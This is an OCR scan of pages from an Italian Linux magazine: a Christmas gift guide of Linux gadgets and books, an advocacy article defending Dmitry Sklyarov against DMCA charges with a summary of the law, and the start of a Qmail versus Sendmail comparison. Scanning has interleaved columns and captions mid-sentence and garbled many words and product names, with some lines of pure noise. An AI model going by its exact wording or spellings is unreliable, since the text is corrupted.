Open Source, scrivendo codice, traducen- 
do testi e manuali, oppure collaudando il 
software, ma se non si e' un hacker o un 
guru della programmazione, l'acquisto di 
materiale da CopyLeft e' sicuramente il 
modo piu' semplice ed abbordabile per 
farlo. 


Altri siti analoghi 


Esistono anche altri siti di vendita con arti 
coli particolari e non rintracciabili sul mer- 
cato al di fuori di Internet. Ad esempio il 
sito di Amazon (www.amazon.com) ha ini- 
ziato con la vendita di libri on-line ed ora 
offre cose di tutti i generi a partire dai DVD 
a finire ai seggioloni per bambini. In realta’, 
rispetto ai precedenti, si trovano pochi 
oggetti legati al mondo di Linux e 
dell'Open Source. Nel settore dei libri, 
invece, si puo' trovare veramente di tutto, 
anche inerente al sistema operativo Linux, 
probabilmente in lingua inglese. La vendita 
avviene nella stessa maniera vista prece- 
dentemente anche se sicuramente il servi- 
zio e' molto piu' completo e forse, per 
economie di scala, anche meno costoso. 
C'e' da dire che il gusto di comperare una 
tazza con il pinguino non e’ sicuramente 
ripagato da un minimo di sconto su acqui- 
sti e spedizioni per oggetti normalissimi. 
A Natale e' proprio il momento giusto per 
fare regali a tutte le persone piu' care e 
quest'anno forse avrete una scusa in piu' 
per fare un regalo a voi stessi o ad amici 
che sono patiti di computer e della Linux 
box. Basta una carta di credito, un PC per 
andare su Internet (su piattaforma Linux, 
mi raccomando) e un po' di tempo per 
scegliere il gadget o l'abbigliamento piu' 
consono alle proprie tendenze hacking. 
Marco Gastreghini 


Strenne sotto l'albero 


el Pinguino 


Un regalo e’ sempre una hella sorpresa per chiunque, ma se e' 
anche di interesse per la persona che lo riceve e rappresenta una 
cosa legata ai suoi hobby e alle sue tendenze, allora vi sara’ 


Veramente grato. 


La tecnologia — 
e le sue meraviglie 


In realta' le idee regalo di questo 
speciale di Linux Magazine possono 
servire benissimo al lettore per pre- 
miarsi da solo, oltre che per aiutarlo 
nella difficile scelta dei regali da met- 
tere sotto l'albero, comprando magari 
un particolare oggetto tecnologico 
che era da tanto che voleva avere. 
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| | Natale e' giunto alle porte e i fans del pinguino non vedono l'ora 


di ricevere dei bellissimi regali sotto l'albero che siano 


direttamente o indirettamente legati a Linux, anche se non 


disdegnano qualsiasi tipo di dono che sia comunque correlato al 


mondo dell'Information Technology e dell'elettronica. Proponiamo 


delle idee utili per aiutare chi deve fare, o deve farsi da solo, un 


regalo di Natale. In questo articolo, un po' fuori dalle righe, 


cerchiamo di capire quali sono i regali giusti per una tipologia di 


persone a noi ben nota: il linuxiano tipo. 


Diamond SONICblue 
Rio One 


Se siete incuriositi dal mondo dei let- 
tori audio digitali basati sul formato 
MP3, ma non sapete da dove comin- 
ciare, allora il modello Rio One da 32 
MB e' quello che fa per voi. Il lettore 
combina una buona fruibilita', una 
compatibilita’ multipiattaforma PC e 
MAC, e una notevole espandibilita' 


Figura | 


Diamond SONICblue Rio One. 


con le card Smart Media. 
www.amazon.com (Prezzo: 89,95 $) 


Compaq iPAQ 3660 


Il famoso PDA (Personal Data 

Assistant) della Compaq ma con una 
particolarita' in piu’, e forse anche la 
piu' importante per la scelta di que- 


iPAQ 


Pocket PC 
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Compaq iPAQ 3660. 


sto regalo, il sistema mLinux 0.9 
preinstallato, con annesso CD conte- 
nente il backup completo del siste- 
ma operativo. Se siete proprio 
masochisti avete a disposizione 
anche il CD di WinCE per riprogram- 
mare la Flash ROM e inserire il 
sistema della casa di Redmond al 
posto del pinguino. Il pacchetto 
comprende i manuali originali, la 
base di collegamento con PC tramite 
USB o interfaccia seriale, due penne 
stilo, batterie e relativo caricatore . Il 
sistema e' multilingue. Il PDA con 
Linux e' anche pronto per il collega- 
mento ad Internet, contiene un 
browser Web, un emulatore di ter- 
minale e puo' essere usato per 
amministrare remotamente un siste- 
ma UNIX o Linux. Il prezzo e' alto 
ma credo che le soddisfazioni siano 
immense. 

www.amazon.com (Prezzo: 695 $) 


Nikon Coolpix 775 


Una delle piu' piccole fotocamere 
digitali sul mercato unita ad una leg- 
gerezza notevole con tanto di copri 
lente. 

La Coolpix 775 e' dotata di 2,4- © 
megapixel CCD che catturano imma- 
gini ad una risoluzione di 1600x1200 
punti, oltre che a 1024x768 e 
640x480 pixel. Puo' adottare tre tipi 
di compressione JPEG: Fine (4:1), 
Media (8:1) e Base (16:1), per un 
totale di nove combinazioni dimen- 
sioni/qualita'. 


consente di inserire le batterie di 
tipo EN-EL1 che si possono ricarica- 
re in meno di due ore. La durata a 
regime di lavorazione e' di circa 
un'ora e mezzo, che non e' niente 
male contando le dimensioni della 
macchinetta fotografica. 
www.hardwarecentral.com (Prezzo: 400 $) 


I-Glasses 


Questi fantastici occhiali servono 
per vedere la televisione, i DVD, il 
videoregistratore e il satellite senza 


"Questi fantastici occhiali servono per vedere la 
televisione, i DVD, il videoregistratore e il satellite” 


Non esiste il modo non compresso 0 
TIFF di cattura delle immagini, ma 
esiste la possibilita’ di creare delle 
piccole animazioni Quicktime fino a 
15 secondi alla risoluzione di 
320x240. La card CompatFlash di 
8MB puo' contenere solo fino ad 8 
foto ad alta risoluzione, ma si puo' 
espandere la memoria con lo slot 
presente sulla destra che accetta le 
carte CompactFlash Tipo |. Inoltre 
c'e' la possibilita' di utilizzare una 
presa USB per collegare la fotoca- 
mera digitale al PC. Il collegamento 
al PC e' molto semplice ed intuitivo. 
Un pannellino sulla parte superiore 


Figura 3 


Nikon Coolpix 775. 


disturbare gli altri presenti nella 
stessa stanza. Si collegano senza 
problemi alle console di videogiochi 
per spararsi direttamente sulla retina 
ad esempio Tekken 3. La profondita’ 
visiva e' eccezionale e il suono e' 
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I-Glasses con dettagli lenti. 


stereo. Inoltre, il dispositivo pesa 
poco e accetta anche segnali S- 
Video e video composito. Le lenti 
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I-Glasses. 
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sono degli schermi LCD da 0,7 pollici 
con 180000 pixel e 260 linee di riso- 
luzione. 

Le cuffie regolabili permettono di 
sentire l'audio stereo in maniera per- 
fetta e sulla parte superiore si trova- 
no vari bottoni per le regolazioni del 
colore, della luminosita', del volume 
e del contrasto. La modalita’ di indos- 
samento degli occhiali e' molto prati- 
ca e comoda, regolabile per qualsiasi 
persona ed esigenza. 
www.thinkgeek.com (Prezzo: 489,99 $) 


La cultura 
del Free Software 


Open Source Development with CVS 
L'editore Coriolis Group ha prodotto 
uno dei primi libri disponibili che trat- 
tano dello sviluppo e dell'implemen- 
tazione del software Open Source. Si 
parla molto di Open Source e di Free 
Software, ma non si conosce poi 
esattamente qual'è la metodologia o 
i problemi che si possono incontrare 


CORIOLISOPEN PRESS 


Open Source 
Development 


with 
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Open Source Development with CVS. 


andando a gestire un progetto 
software basato su questa filosofia e 
con sviluppatori magari sparsi in tutto 
il mondo. 

Questo libro comprende un'introdu- 
zione dettagliata, un tutorial e utili 
riferimenti al Concurrent Versions 
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System (CVS), il sistema di controllo 
delle revisioni del software piu' utiliz- 
zato nella comunita’ della rete. Il 
testo contiene anche una dettagliata 
analisi delle convenzioni e delle tecni- 
che dello sviluppo Open Source, 
comparati con il CVS. Il regalo e' 
adatto a chi si avvicina per la prima 
volta allo sviluppo di software Open 
Source e a chi e' gia'un veterano per 
capire come viene utilizzato oggi il 
famoso sistema di revisione nello svi- 
luppo del Free Software. 

Adatto chiaramente solo ai veri pro- 
grammatori. 

www.amazon.com (Prezzo: 39,99 $) 


100 Great Linux 
Games Volume 1 


Un pacchetto software che include 
un'ampia raccolta di giochi per Linux. 
Tra le decine di titoli tutti in un CD 
troviamo: Freeciv, Lin City, GNU 
Chess, Maelstrom e Xasteroids. Per 
capire, prima di installarlo, se il gioco 
e' interessante, l'utente puo' vedere 
gli screenshot relativi, leggere una 
breve descrizione, il manuale utente 


Includes 


BONUS bal i Tra de 


Ù eta 


dl 


Figura 7 


100 Great Linux Games Volume 1. 


e visitare il sito Web del produttore. 
Il pacco include anche Caldera Open 
Linux Light e quattro giochi della 
Loki: Civilization Call to Power, Myth 
II, Railroad Tycoon Il e Eric's Ultimate 


Solitarie. Insomma, ci vorra’ molto 
molto tempo per giocarli tutti.. 
www.amazon.com (Prezzo 19,99 $) 


Just For Fun 


Un libro, edito dalla Harper Business, 
scitto a quattro mani da Linus 
Torvalds e David Diamond per rac- 


LINUS 


TARVALDS 


cutaroa or LINUX 
ano DAVID DIAMONDÌI 
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Just For Fun. 


contare la storia di Linus stesso, il 
creatore del sistema Linux. Il sottoti- 
tolo “Storia di un rivoluzionario acci- 
dentale” denota subito il taglio del 
libro che cerca di spiegare con tono 
divertente e molto informale come 
mai un ragazzino dell'Universita’ di 
Helsinki, con l'aspetto da nerd, possa 
essere diventato un eroe nazionale 
conosciuto in tutto il mondo. 

Il testo, con la scusa di raccontare 
questa trasformazione, porta il lettore 
dalle idee iniziali che hanno dato alla 
luce Linux, fino alle distribuzioni 
attuali e alla diffusione del sistema 
Free Software piu' amato nel mondo. 
Anche se Linus ora viaggia in BMW e 
sa di avere fama e onori, continua a 
ripetere che la sua idea, che ha cam- 
biato radicalmente il mondo della tec- 
nologia, si e'concretizzata solo per 
un'unica semplice ragione: “Just for 
Li [o PSE 

www.thinkgeek.com (Prezzo 20,99 $) 


Le stramberie del 
piccolo hacker 


Orologio Tux 


Un orologio sportivo di colore giallo 
e con le lancette posizionate al cen- 
tro di un Tux sul quadrante nella 
classica posa seduta. Il cinturino e' 
di stoffa con allacciatura in velcro e 


Figura 9 
Orologio Tux. 


la cassa e' in plastica con una gros- 
sa ghiera numerata intorno al qua- 
drante. Per un vero amante di Linux 
e' un oggetto da indossare con orgo- 
glio e assiduita'. 

www.justlinux.com (Prezzo: non dispo- 
nibile) 


Gear Grip Pro 


Avete mai dovuto portare il vostro 
PC desktop ad un Linux Installation 
Party, oppure ad una serata con gli 
amici per giocare ad Unreal 
Tournament? In questi casi, di solito, 
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Gear Grip Pro. 


non si sa mai come portare l'ingom- 
brante e pesante desktop oppure si 
dimenticano i cavi di rete e di ali- 
mentazione, sempre che non si lasci 
a casa direttamente il mouse, ren- 
dendo inutile il trasporto. Per tutti i 
nomadi che non si vogliono mai divi- 
dere dal proprio PC ora esiste un 
porta-desktop con tanto di cinghie 
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spetta. In pratica il kit consiste di: un 
rettangolo di acrilico trasparente con 
gli angoli smussati, delle guarnizioni 
a contorno e un manuale di istruzio- 
ni. Seguendo le istruzioni dovrete 
tagliare il “case” del PC e inserire la 
finestra trasparente. Il taglio viene 
spiegato nei minimi particolari dalle 
istruzioni. 


“Un orologio sportivo di colore giallo e con le 
lancette posizionate al centro di un Tux sul 
quadrante nella classica posa seduta." 


regolabili e retina porta tastiera. E' 
dotato di una robusta maniglia per il 
trasporto e di una cinghia a tracolla 
collegata con ganci di metallo alla 
struttura in tela. 

www.thinkgeek.com (Prezzo: 34,99 $ 
- dim. regolare; 36,99 $ - dim. large) 


Window kit 


Non c'entra niente con il sistema di 
Bill Gates perche’ “window”, in 
questo caso, sta proprio per finestra. 
Una vera finestra aperta sul vostro 
PC per dargli l'importanza che gli 


figura 
Window kit. 


Per il tocco finale aggiungete il kit 
con una lampada al neon blu che si 
installa internamente. Una vera follia 
per veri Geek. 

www.thinkgeek.com (Prezzo: 29,99 $) 


Conclusioni 


In questa carrellata di regali, piu' o 
meno seri, sono stati illustrati vari 
tipi di oggetti, dagli ultimi ritrovati 
della tecnologia ai simboli del nuovo 
mondo Open Source e degli Hacker 
del kernel Linux. Ognuno puo' trova- 
re il regalo piu' adatto, ma la costan- 
te che li unisce tutti e' sicuramente 
la capacita’ di essere doni originali e 
in linea con le nuove mode tecnoogi- 
che del mondo di Internet e del pin- 
guino. 
Sempre meglio del solito maglione 0 
sciarpa che tutti gli anni vengono 
scambiati fra parenti e amici nella 
notte di Natale. Quest'anno mettete 
anche un piccolo Tux sotto il vostro 
alberello di Natale e chissa’ che 
qualcuno dei presenti, all'apertura 
dei regali, non riesca ad imparare 
che esiste anche un'altra scuola di 
pensiero. 
Buon Natale 

Marco Gastreghi 
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Free Dmitry 


Sklyarov! 


È Natale: perché non aiutare chi da anni si batte con impegno e 
convinzione per il dun) di una delle nostre più sacre e 
inviolabili liberta, quella di pensiero e d'espressione? 


utti noi, nel clima natalizio che già si respira appieno, abbiamo iniziato 
i pensare ai regali da fare ad amici e parenti. E sempre più numerosi 
sono gli appelli di vari organismi a sostegno dei loro progetti umanitari: è 
il tradizionale momento dell'altruismo e dell'amore per il prossimo, e tutti 
siamo un po' più disposti ad aiutare chi è stato meno fortunato di noi. Il 
Natale, però, può diventare anche un pretesto per sentirsi più vicini a chi 
ancora oggi, nella così detta ‘società civile’, vede calpestati i propri diritti. 
È un modo, oltretutto, per difendere anche noi stessi e le nostre libertà 
fondamentali, sempre più spesso negate nell'odierna era 
dell'informazione. Uno dei possibili modi per farlo è appoggiare, anche 
economicamente, le organizzazioni che con impegno si battono per 
difendere e garantire il rispetto dei nostri diritti. Non servono grandi 
somme, ma solo tanta buona volontà e desiderio di esserci, per far 
sentire alta la nostra voce. 


| fatti 


È ormai in pieno svolgimento, negli 
Stati Uniti, il processo contro Dmitry 
Sklyarov, il giovane programmatore 
russo accusato di aver violato la 
legge USA sul diritto d'autore, l'ormai 
famigerato Digital Millennium 
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Copyright Act (DMCA). Dmitry è 
stato arrestato il 16 luglio a Las 
Vegas, Nevada, dagli agenti dell'FBI, 
durante una conferenza sulla sicurez- 
za informatica, la DefCon 9. Era lì per 
spiegare come, grazie alla collabora- 
zione della società ElcomSoft di 
Mosca, fosse riuscito a mettere in 


pratica i suoi studi di crittografia e i 
contenuti della sua tesi di laurea sulla 
sicurezza dei libri elettronici, com- 
prensiva dei dettagli per bypassare i 
sistemi anti-duplicazione usati 
dall'Adobe eBook Reader (www. def- 
con.org/html/ defcon-9- 
speakers.html). 


Dmitry, dopo essere stato detenuto 
in ben tre carceri (Las Vegas, 
Oklahoma e infine San Josè), il 6 
agosto è stato finalmente rilasciato, 
grazie al pagamento da parte della 
Electronic Frontier Foundation di una 
cauzione di 50.000 dollari; ma al 
momento gli è impedito di allonta- 
narsi dalla California e di tornare in 
Russia. Già pochi giorni dopo il suo 
arresto, tutta la Rete, indignata, si 
era sollevata a sua difesa, e studiosi 
ed accademici avevano nuovamente 
sottolineato come scrivere codice 
possa senza dubbio essere parago- 
nato allo scrivere un libro o alla crea- 
zione di una qualsiasi altra opera 
d'arte e come, quindi, tale attività 
vada indubbiamente enumerata tra 
le forme di espressione protette, tra 
l'altro, dal Primo Emendamento alla 
Costituzione degli Stati Uniti (quello 
che garantisce il rispetto delle libertà 
di parola e di pensiero, per intender- 
ci). Maggiori informazioni e gli atti 
del processo sono disponibili su 
www.eff.org/IP/DMCA/US_v_ Skly- 
arov/e su www.usdoj.gov/usao/ 
can/press/html/2001_08_28_skya- 
rov.html . 


C. 0 


comune Portable Document Format 
(PDF), aperto e liberamente utilizza- 
bilie da tutti. Come è sottolineato 
nello stesso sito della ElcomSoft 
(www.elcomsoft.com), l'AEBPR non 
fa altro che rimuovere le notevoli re- 


Figura | 
Dmitry Sklyarov. 


strizioni imposte dall'’Adobe eBook 
Reader ai suoi utenti, e rendere così 
possibile, o anche solo più semplice, 
a chi è legittimo proprietario del li- 
bro, compiere delle operazioni, indi- 
spensabili e soprattutto non lucrati- 


“L'accusa rivolta contro Dmitry e contro la società 
dla cui dipende, la ElcomSoft, è quella di aver 
distribuito un software, l'Advanced eBook 
Processor (AEBPR). ..” 


l’accusa 


L'accusa rivolta contro Dmitry e con- 
tro la società da cui dipende, la 
ElcomSoft, è quella di aver distribui- 
to un software, l'Advanced eBook 
Processor (AEBPR), che ha la capa- 
cità di aggirare le misure tecniche 
poste dalla Adobe a protezione dei 
suoi ebook. Conseguenza ne sareb- 
be la violazione della legge sul copy- 
right. 

Il programma, infatti, decriptando il 
libro elettronico, lo traduce dal for- 
mato proprietario di Adobe nel più 


ve, come il leggerlo, lo stamparlo, 
l'archiviarlo o il farne un back up. 

Il programma, che, è bene sottoli- 
nearlo, gira solo su ebook acquistati 
in modo lecito, può utilmente essere 
usato, per esempio, da persone non 
vedenti per leggere libri altrimenti a 
loro inaccessibili; oppure da chi sem- 
plicemente vuole spostare un ebook 
da un computer ad un altro, per ren- 
derne più agevole la fruizione (tutti 
sappiamo, infatti, come un libro elet- 
tronico, una volta scaricato su Un 
computer, ad esso rimane stretta- 
mente legato, potendo essere letto 


ve r S t o r yess 


solo attraverso quel pc). 


La difesa 


La Electronic Frontier Foundation 
(EFF), che si è incaricata della difesa 
di Dmitry, è convinta che la vicenda 
non sia altro che il risultato di una 
forzata ed errata lettura del Digital 
Millennium Copyright Act, una vera 
violazione del diritto, universalmente 
riconosciuto a tutti gli esseri umani, 
di pensare ed esprimersi liberamen- 
te. È vero che l'Advanced eBook 
Processor, una volta convertiti i libri 
elettronici in un formato aperto co- 
me è il PDF, può rendere più facile 
violare i diritti d'autore, permetten- 
do, ad esempio, una incontrollabile 
distribuzione del libro stesso; ma è 
ugualmente vero che il programma 
può avere anche molti usi più che 
legittimi. Come hanno sostenuto e 
continuano con forza a sostenere gli 
avversari del DMCA, è un errore 
bandire a priori delle tecnologie qua- 
li, ad esempio, il convertitore di for- 
mato del programmatore russo: è di 
gran lunga preferibile regolamentare 
i fini per cui esse sono utilizzate. 


Il Digital Millennium 
Copyright Act 


Secondo la Motion Picture Associa- 
tion of America, il DMCA rappresen- 
ta un ottimo mezzo per difendere i 
diritti degli autori in questa epoca di 
nuove tecnologie, e un vantaggio 
per gli utenti. L'industria dell'intratte- 
nimento non vuole limitare l'accesso 
legittimo a libri, musica o film; il suo 
obiettivo è solo quello di rendere 
possibile a chi vuole mettere on line 
il proprio prezioso lavoro di farlo in 
tutta tranquillità, e di garantirgli un 
guadagno che ha tutti i diritti di pre- 
tendere. Il DMCA, quindi, combatte 
solo coloro che violano programmi 
crittografati, rendendo possibile usu- 
fruirne in modo del tutto gratuito ed 
illecito. Un rappresentante legale 
della EFF, Robin Gross, sottolinea, 
invece, come in passato tutte le leg- 
gi a difesa del copyright non fossero 
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altro che dei semplici strumenti per 
garantire ad autori e musicisti un ri- 
scontro economico al loro lavoro, ma 
ciò solo per un numero determinato 
di anni (in Italia i diritti d'utilizzazione 
economica dell'opera durano fino a 
cinquant'anni dopo la morte dell'auto- 
re, n.d.r.). Il DMCA, invece, è chiara- 
mente finalizzato ad arricchire, senza 
limiti di tempo, editori e società, 
ignorando completamente, e in alcuni 
casi negando, quel ‘fair use' ormai 
consolidatosi nella pratica giuridica 
statunitense. Il diritto d'autore, nato 
per proteggere le idee e la loro libera 
espressione, oggi è diventato solo 
uno strumento per impedire al pub- 
blico di ricevere informazioni, so- 
stiene Gross, per far tacere le criti- 
che e per stroncare gli avversari. 

“Ma anche se lasciamo da parte le 
serie questioni legali che riguardano 

il DMCA, il reato di Dmitry non può 
essere certo considerato talmen- 

te grave da richiedere una per- 
secuzione così dura”, dice il 
suo difensore. “Le attività 

di Sklyarov e della 

ElcomSoft non sono certo 

del tipo che il Congresso 
intendeva condannare”. Dal 
modo in cui il governo ha trat- 
tato Dmitry, risulta infatti evidente 
che lo considera un pericoloso pirata 
informatico, un ‘hacker’ nel senso 
peggiore del termine. In realtà, la 
ElcomSoft e il governo statunitense 
da tempo lavorano fianco a fianco per 
combattere il crimine. La società 
russa sviluppa programmi che recu- 
perano le password dei computer e 
si occupa della sicurezza, aiutando ad 
identificare e rintracciare pirati e ladri 
informatici. | suoi software e i suoi 
servizi di consulenza sono usati in più 
di 80 paesi nel mondo e soprattutto 
dalle stesse forze di polizia statuni- 
tensi, dall'FBI fino agli sceriffi locali, 
passando per i servizi segreti. Il 
DMCA ha lo scopo di perseguire 
coloro che non hanno riguardo per la 
proprietà e i diritti degli autori: 
"ElcomSoft è l'esatto contrario di 
questo genere di persone”, ha 
dichiarato Alex Katalov, presidente 
della società. “Abbiamo lavorato per 


tanto tempo in accordo con il gover- 
no di questo Paese, e potete quindi 
immaginare la nostra incredulità 
quando abbiamo sentito che ora ci 
considerano pericolosi criminali”. 


La libertà della. 
ricerca scientifica è 


oggi seriamente in 
pericolo 


Dmitry è tra le prime vittime ufficiali 
del Digital Millennium Copyright Act. 
Ma non è l'unica. Anche se si vuole 
sorvolare sul caso DeCSS di qualche 
tempo fa, basta ricordare la più re- 
cente vicenda di un docente universi- 
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La maglietta in vendita su Copyleft. 


tario, Edward Felten, colpevole di 
aver seguito un ormai universalmen- 
te riconosciuto metodo scientifico, 
consistente nell’esaminare il lavoro di 
altri studiosi per cercarne i punti de- 
boli e, ovviamente, eliminarli. Felten 
aveva semplicemente dichiarato di 
voler pubblicare i suoi studi su un si- 
stema di protezione dei brani musica- 


li in rete che ne mettevano in eviden- 
za le lacune. E il Dipartimento di Giu- 
stizia americano, senza neanche dar- 
gli il tempo di farlo, ha brandito la 
legge contro di lui. E già c'è chi, co- 
me l'olandese Niels Ferguson, per ti- 
more di incappare nelle rigide maglie 
del DMCA, ha preferito non rendere 
pubblici i risultati dei suoi studi sulla 
crittografia. In una dichiarazione di- 
stribuita on line, Ferguson ha sottoli- 
neato come la legge USA, nata allo 
scopo di rendere illegale una ‘tecno- 
logia di aggiramento', è invece di nor- 
ma usata per colpire chi pubblica do- 
cumenti scientifici; questo solo per- 
ché vi viene evidenziata la debolezza 
di un sistema informatico. Ciò mette 
a serio rischio l'avanzamento della ri- 
cerca scientifica, l'esercizio dei diritti 
di ‘fair use' e la stessa libertà di paro- 
la. "Il DMCA considera illecito parlare 
di certi sistemi di sicurezza”, dichia- 
ra Ferguson. "E' come se si 
considerasse illegale mettere in 
guardia i consumatori sulla de- 
bolezza della loro serratura di 
casa solo perché i ladri po- 
trebbero trarre vantaggio 
da queste medesime 
informazioni” (www.mac- 
fergus.com/niels/dmca/cia. 
html). Il caso di Dmitry ha suscitato 
tali reazioni in tutta la comunità inter- 
net, che la stessa Adobe si è vista 
costretta a chiarire come il suo scopo 
non fosse di arrivare all'arresto del 
giovane programmatore, ma solo di 
agire penalmente contro la Elcom- 
Soft. Sono stati sollevati anche dubbi 
sulla competenza dell'autorità statu- 
nitense a giudicare un cittadino russo 
per aver tenuto una condotta che, sì, 
negli Stati Uniti è reato, ma che non 
lo è in Russia. In questo Paese colui 
che possiede legalmente una copia di 
un programma o di un database ha il 
diritto di modificarlo e di farne una 
copia per il proprio archivio, al fine di 
sostituirlo se diventato inutilizzabile o 
andato disperso. E tutto questo sen- 
za l'esplicito consenso del titolare del 
diritto d'autore e senza il pagamento 
di alcun compenso maggiore. Ciò 
vuol dire che in Russia chi distribui- 
sce un programma non può impedire 


in aleun modo che venga esercitato 
il diritto di copiarlo: insomma, se 
non ci fosse l'Advanced eBook 
Processor della ElcomSoft l'Adobe 
eBook Reader sarebbe lì assoluta- 
mente illegale (www. freesklyarov. 
org/background/russia.html). Per non 
parlare, poi, di quello che accadreb- 
be se un Paese, in cui una determi- 
nata attività è considerata illegale, 
potesse applicare le sue leggi contro 
chi compie quella medesima attività 
in un altro Paese in cui è invece 
considerata lecita. 


Magliette 
e non solo... 


E veniamo ora a come aiutare 


Dmitry e sostenere la EFF nella sua 
importante attività. Prima di tutto, 
sul sito della ElcomSoft è stata 
promossa una raccolta di fondi per 
la difesa del giovane 
programmatore; si tratta di assegni 
o accrediti bancari che vanno 
indirizzati al suo avvocato 
(www.elcomsoft.com/ aebpr. html). 
Simpatiche sono poi le magliette in 
vendita in alcuni siti di commercio 
elettronico: è il caso di 
www.copyleft.net/item.phtml?page 
product_1270_front.phtmi, 
www.cafepress.com/cp/store/store. 
aspx?storeid= oss4lib e di 
www.thinkgeek.com/ stuff/apparel/ 
38ff.shtml (vd. anche 
www.x-omega.com/shirtdept/). 

Le scritte sono molto eloquenti: 


Il Digital Millennium Copyright Act 


“Free Sklyarov!” oppure “Fight the 
DMCA - ask me how". 
| ricavati andranno parzialmente o 
totalmente (dipende dal sito) alla 
EFF, a finanziamento della sua 
attività legale. 
Sul sito di Copyleft è in vendita 
anche una intera serie di magliette 
che riguardano il caso DeCSS. È un 
modo per aiutare concretamente 
Dmitry e chiunque come lui si trova 
nella condizione di non poter 
esprimere liberamente quello che 
ritiene giusto. 
Un modo per evitare che, in un 
futuro il più lontano possibile, 
qualcuno possa imporre con la forza 
anche a noi quello che dobbiamo o 
non dobbiamo dire o pensare. 
Serena lovacchini 


Il 12 ottobre 1998 il Congresso degli Stati Uniti ha approvato il 
Digital Millennium Copyright Act. Ciò dopo mesi di turbolenti 
discussioni e dibattiti che hanno visto contrapposti scienziati e 
accademici, l'industria dell'intrattenimento e gli imprenditori della 
Silicon Valley. La legge, nelle intenzioni del Congresso, doveva 
sostituire le preesistenti norme federali sul copyright e regola- 
mentare le nascenti tecnologie. Due settimane dopo, il 28 otto- 
bre, il presidente Clinton l'ha promulgata. L'Act è l'attuazione del 
Trattato internazionale sul diritto d'autore, concluso a dicembre 
1996 a Ginevra, durante la Conferenza diplomatica dell'Organiz- 
zazione mondiale della proprietà intellettuale (OMPI). Ma contie- 
ne anche previsioni non contemplate nel Trattato e comunque 
riguardanti materie correlate. 


La legge 


e Considera reato aggirare le misure anti-pirateria contenute 
in molti dei programmi in commercio. 


e Condanna la fabbricazione, la vendita e la distribuzione d'ap- 
parecchiature che, infrangendo i codici, possono essere 
adoperate per copiare illegalmente software. 


Permette l'aggiramento di una misura tecnica di protezione 
solo a determinati scopi: per valutare l'interazione tra pro- 
grammi, per testare la sicurezza dei sistemi informatici e a 
fini di ricerca sulla crittografia. 


Prevede l'esenzione dalle norme anti-aggiramento per gli 
enti no profit come biblioteche, archivi e istituti d'istruzione, 


anche se ciò solo a determinate condizioni. 


In genere, limita la responsabilità dei provider di servizi su 
Inernet nella loro attività di trasmissione d'informazioni in 
rete. 


| provider sono sempre tenuti a rimuovere dai siti web dei 
loro utenti tutto il materiale che potrebbe violare il copyri- 
ght. 


Limita la responsabilità delle istituzioni no profit d'alta edu- 
cazione (es. università) che forniscono servizi on line agli 
utenti, quando la violazione del diritto d'autore è da parte di 
membri della facoltà o di studenti laureati. 


Richiede che i ‘webcaster’ paghino canoni di licenza alle 
case discografiche. 


Richiede che il Registro dei Diritti d'autore, dopo aver con- 
sultato i principali partiti politici, sottoponga al Congresso 
raccomandazioni su come promuovere l'istruzione a distan- 
za attraverso le tecnologie digitali, comunque “mantenendo 
un appropriato bilanciamento tra i diritti e gli interessi degli 
autori e i bisogni degli utenti”. 


Stabilisce esplicitamente che la legge non debba essere 
applicata ad attività che non costituiscano violazione del 
copyright, e non debba quindi incidere su altri diritti, difese, 
limiti, compreso il fair use. 

http://www .gseis.ucla.edu/iclp/dmca1.htm 


S 
CONSUMER 


Omail Vs Sendmall, 


ovvero i Davide e Golia 
della Rete 


Scopriamo insieme le caratteristiche di OMAIL e SENDMAIL, i due applicativi più 
utilizzati in ambiente Linux per lo scambio di messaggi di posta elettronica. 


mail è considera- 

to un'alternativa 

sicura a Send- 

mail, concepito 
con l'obiettivo della sicurez- 
za, quali sono le sue carat- 
teristiche e perché utilizzare 
Omail piuttosto che puntare 
su Sendmail o altri server, e 
perché non vice-versa. A 
queste e ad altre domande 
cercheremo di dare un'e- 
saustiva risposta. 


Cosa è un MTA 


Con la sigla MTA (Mail 
Transfer Agent) intendiamo 
un applicativo che si occupa 
della consegna dei messag- 
gi di posta. In effetti più che 
della consegna ai destinata- 
ri, MTA ha il compito di in- 
stradare (routing) verso i 
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server mail giusti i diversi 
messaggi di posta. In effetti 
poi sono i client POP o 
IMAP che si occupano di 
leggere il messaggio e di 
presentarlo all'utente finale. 
Con l'enorme crescita che 
ha avuto la rete, il traffico di 
messaggi e-mail è diventato 
di gran lunga l'utilizzo pri- 
mario di internet. Proprio 
per questo, gli applicativi le- 
gati a questa funzione si so- 
no dovuti evolvere, e fra 
tutti quello che è diventato 
lo standard di fatto è pro- 
prio Sendmail. 

Questo programma, grazie 
ad un numero enorme di 
opzioni di configurazioni, è 
in grado di svolgere egre- 
giamente il compito di 
MTA. Il suo ideatore, Eric 
Allman della UC Berkley, fu 
il primo a supportare l’inol- 


tro di messaggi verso reti 
diverse da quella di origine 
del messaggio stesso. Sono 
stati scritti veri e propri trat- 
tati sulla configurazione di 
Sendmail che proprio per 
questo è uno dei servizi di 
rete più ostici da gestire. 
Non per questo però 
Sendmail non ha rivali che 
gli contendono il primato. Il 
principale antagonista di 
Sendmail è il Qmail, un pic- 
colo e sicuro server scritto 
da Dan Bernstein. Eccoci 
allora di fronte ad uno scon- 
tro che ricorda l'episodio 
bibblico fra Davide e Golia, 
ma ora il contesto è solo un 
po' diverso... 


La sfida 


Non a caso nel paragrafo 


» uv 


precedente si è dato risalto 
alla “mole” del Sendmail e 
alla piccolezza e sicurezza 
del Omail. Questi sono solo 
i punti di partenza di una 
diatriba che sulla rete dura 
da moltissimo tempo. Tale 
discussione è paragonabile 
a quella sull'assegnazione 
della palma d'oro come 
migliore sistema operativo 
fra Linux e FreeBSD. Si 
potrebbe stare giorni e gior- 
ni a parlarne, a leggere arti- 
coli e recensioni, senza però 
giungere ad una conclusio- 
ne oggettiva in favore del- 
l'una o dell'altra soluzione. 
Proprio per questo il pre- 
sente articolo non indicherà 
il vincitore della sfida, 
anche perché non c'è un 
vincitore, ma di sicuro chia- 
rirà i vari aspetti che diffe- 
renziano i due server SMTP 


The gmail home page 
mail 


quali RSTERT fEPITET, AStERET, ADRIRXTJAGZI-D1 LT, 


gmail: Pyccxuù ungopuayuozÙÒini calm 
‘a 3 ei 
1) 7UY UE EHOIFI 
Proyecto DoOmail - Documentaciòn y soporte a amail en castellano 


mail francophone 


qmail is a modern SMTP server which makes sendmail obsolete, written by Dan Bernstein, who also has a web page for ama qmailis a secure package. There 
was a £1,000.00 prize for anyone who can show otherwise, which went unclaimed. You can download ama 1 03 (Redhat RPM:, tà Mandrake RPMSs, and 
